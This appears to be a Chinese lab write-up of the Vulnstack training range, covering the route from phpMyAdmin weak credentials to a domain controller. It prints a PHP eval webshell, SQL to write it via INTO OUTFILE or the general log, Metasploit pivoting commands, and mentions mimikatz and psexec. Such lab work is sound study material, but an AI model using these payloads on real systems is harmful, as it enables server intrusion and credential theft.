http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
一、web渗透
# 测试时虚拟机通过frp映射出了web端口,省略端口扫描等步陬通过目录扫描发现了phpmyadmin通过弱口令root:root登录到后台
phpmyadmin页面获取shell方法一:select into outfile直接写入对web目录需要有写权限能够使用单引号(root)知道网站绝对路径(phpinfo/php探针/通过报错等)secure_file_priv没有具体值查看secure_file_priv值show global variables like '%secure%';
当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权当 secure_file_priv为空时写入一句话木马select '<?php @eval($_POST[mc]); ?>' INTO OUTFILE 'C:\\phpStudy\\WWW\\shell.php 'secure_file_priv的值为 NULL,无法使用此方法获取webshell权限方法二:利用全局日志写webshellSHOW VARIABLES LIKE '%general%'general_log_file为日志保存的位置开启general_log模式set global general_log = on;修改日志目录为shell地址set global general_log_file = "C:\\phpStudy\\WWW\\shell.php";写入webshellselect '<?php eval($_POST[mc]);?>'
yxcms后台getshell发现存在yxcms站点,在公告信息中泄露了后台账号密码寻找历史漏洞,在前台模板处写入webshell在yxcms源码中发现模板文件存放位置/yxcms/protected/apps/default/view/default/成功链接webshell
获取到webshell之后通过cs生成exe木马上线web服务器通过扫描发现两台主机,并发现当前为域环境god.org域控为woa 192.168.52.138将会话迁移到msf上创建路由开启socketrun get_local_subnets# 模块自动添加路由run post/multi/manage/autoroute# 查看路由添加情况run autoroute -p# 添加指定路由run autoroute -s 192.168.52.0/24#创建socket代理use auxiliary/server/socks_proxy
通过mimikatz读取密码,使用psexec链接获取域控权限
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论